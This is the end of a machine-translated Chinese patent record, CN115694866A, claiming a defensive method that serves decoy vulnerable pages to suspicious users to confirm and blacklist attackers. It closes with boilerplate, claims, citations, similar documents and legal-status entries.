The flowchart and block diagrams in the figures illustrate the architecture, functionality, and operation of possible implementations of systems, methods and computer program products according to various embodiments of the present disclosure. In this regard, each block in the flowchart or block diagrams may represent a module, segment, or portion of code, which comprises one or more executable instructions for implementing the specified logical function(s). It should also be noted that, in some alternative implementations, the functions noted in the block may occur out of the order noted in the figures. For example, two blocks shown in succession may, in fact, be executed substantially concurrently, or the blocks may sometimes be executed in the reverse order, depending upon the functionality involved. It will also be noted that each block of the block diagrams or flowchart illustration, and combinations of blocks in the block diagrams or flowchart illustration, can be implemented by special purpose hardware-based systems which perform the specified functions or acts, or combinations of special purpose hardware and computer instructions.
Those skilled in the art will appreciate that various combinations and/or combinations of features recited in the various embodiments and/or claims of the present disclosure can be made, even if such combinations or combinations are not expressly recited in the present disclosure. In particular, various combinations and/or combinations of the features recited in the various embodiments of the present disclosure and/or the claims may be made without departing from the spirit and teachings of the present disclosure. All such combinations and/or associations are within the scope of the present disclosure.
The embodiments of the present disclosure have been described above. However, these examples are for illustrative purposes only and are not intended to limit the scope of the present disclosure. Although the embodiments are described separately above, this does not mean that the measures in the embodiments cannot be used advantageously in combination. The scope of the disclosure is defined by the appended claims and equivalents thereof. Various alternatives and modifications can be devised by those skilled in the art without departing from the scope of the disclosure, and these alternatives and modifications are intended to fall within the scope of the disclosure.

Claims (12)

1. An interactive attack validation method, comprising:
intercepting a service access request sent by a user to an application server;
performing attack detection on the service access request, wherein the attack detection is used for detecting the attack behavior of the user;
and based on the attack detection result, if the service access request hits a specific behavior rule, returning an attack induction response page in response to the service access request to perform N times of interactive attack detection on the user, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
2. The method of claim 1, wherein the N interactive attack detections of the user comprises:
the following steps are executed in a circulating way until the circulation is performed for N times or a preset condition is met,
intercepting an attack induction request sent by the user to the application server, wherein the attack induction request comprises an access request sent by the user in response to the attack induction response page;
performing the attack detection on the attack inducement request;
and if the attack inducement request hits a specific behavior rule, responding to the attack inducement request and returning the attack inducement response page.
3. The method of claim 2, wherein the predetermined condition comprises confirming that the attack inducement request hits an attack condition, or confirming that the attack inducement request misses the attack condition,
if the attack inducing request hits the attack behavior rule, the IP address of the user is added into the blacklist library, and the circulation is finished; or
If the attack inducing request is confirmed to miss the attack behavior rule and the specific behavior rule, confirming that the attack behavior does not exist, and ending circulation.
4. The method of claim 2, wherein prior to each return of the attack inducement response page, the method further comprises:
randomly selecting and determining an attack induction response page of the time from an attack test library, wherein the attack test library comprises M attack induction response pages, and each attack induction response page has different attack vulnerabilities.
5. The method of claim 1, wherein after intercepting a service access request sent by a user to an application server, the method further comprises:
storing the service access request based on the user identification of the user;
and if the service access request hits the specific behavior rule, carrying out the N times of interactive attack detection based on the user identification.
6. The method of any one of claims 1 to 5, wherein if it is determined that the aggressive behavior is not present, the method further comprises:
and sending the service access request to the application server.
7. The method of claim 1 or 2, wherein the attack detection of the traffic access request or the attack induced request comprises:
matching the service access request or the attack inducing request by utilizing an attack test library, wherein the attack test library comprises attack behavior rules and the specific behavior rules; and/or
Performing at least one of the following detection steps:
matching the IP address of the user with at least one white list address in a white list library, wherein the at least one white list address is used for directly releasing the service access request;
and matching the IP address of the user with at least one blacklist address in a blacklist library, wherein the at least one blacklist address is used for directly blocking the service access request.
8. An interactive attack validation device comprising:
the request intercepting module is used for intercepting a service access request sent to the application server by a user;
an attack detection module, configured to perform attack detection on the service access request, where the attack detection is used to detect an attack behavior of the user;
and the attack induction module is used for responding to the service access request and returning an attack induction response page if the service access request hits a specific behavior rule based on the result of the attack detection so as to perform N times of interactive attack detection on the user, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
9. An interactive attack validation system comprising:
the client is used for responding to the operation of the user and sending a service access request to the application server;
a monitoring server, configured to execute the interactive attack confirmation method according to any one of claims 1 to 7, and send the service access request to the application server when confirming that the user does not have an attack behavior;
and the application server is used for receiving the service access request sent by the monitoring server.
10. An electronic device, comprising:
one or more processors;
a storage device for storing one or more programs,
wherein the one or more programs, when executed by the one or more processors, cause the one or more processors to perform the method of any of claims 1-7.
11. A computer readable storage medium having stored thereon executable instructions which, when executed by a processor, cause the processor to perform the method according to any one of claims 1 to 7.
12. A computer program product comprising a computer program which, when executed by a processor, implements the method according to any one of claims 1 to 7.
CN202210855954.5A 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium Pending CN115694866A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210855954.5A CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210855954.5A CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Publications (1)

Publication Number Publication Date
CN115694866A true CN115694866A (en) 2023-02-03

Family

ID=85061147

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210855954.5A Pending CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Country Status (1)

Country Link
CN (1) CN115694866A (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116108438A (en) * 2023-04-10 2023-05-12 中国工商银行股份有限公司 Attack detection method, apparatus, device, medium, and program product

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116108438A (en) * 2023-04-10 2023-05-12 中国工商银行股份有限公司 Attack detection method, apparatus, device, medium, and program product

Similar Documents

Publication Publication Date Title
US10467411B1 (en) System and method for generating a malware identifier
US8805995B1 (en) Capturing data relating to a threat
US8943594B1 (en) Cyber attack disruption through multiple detonations of received payloads
US9971891B2 (en) Methods, systems, and media for detecting covert malware
US10270805B2 (en) System and method thereof for identifying and responding to security incidents based on preemptive forensics
CN107612924B (en) Attacker positioning method and device based on wireless network intrusion
Rawat et al. Association rule learning for threat analysis using traffic analysis and packet filtering approach
CN111786966A (en) Method and device for browsing webpage
CN107579997A (en) Wireless network intrusion detection system
CN111651757A (en) Attack behavior monitoring method, device, equipment and storage medium
CN107465702B (en) Early warning method and device based on wireless network intrusion
Sundareswaran et al. Detecting malicious co-resident virtual machines indulging in load-based attacks
US9866575B2 (en) Management and distribution of virtual cyber sensors
CN107566420B (en) Method and equipment for positioning host infected by malicious code
CN114531258B (en) Network attack behavior processing method and device, storage medium and electronic equipment
CN114826663B (en) Honeypot identification method, device, equipment and storage medium
US11693961B2 (en) Analysis of historical network traffic to identify network vulnerabilities
CN111464526A (en) Network intrusion detection method, device, equipment and readable storage medium
KR102002880B1 (en) Method for detecting malcious packets based on machine learning model and apparatus using the same
CN112615863A (en) Method, device, server and storage medium for resisting attack host
KR101768079B1 (en) System and method for improvement invasion detection
CN115694866A (en) Interactive attack confirmation method, device, system, equipment and medium
CN111541701B (en) Attack trapping method, device, equipment and computer readable storage medium
CN113489703A (en) Safety protection system
KR101767591B1 (en) System and method for improvement invasion detection

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination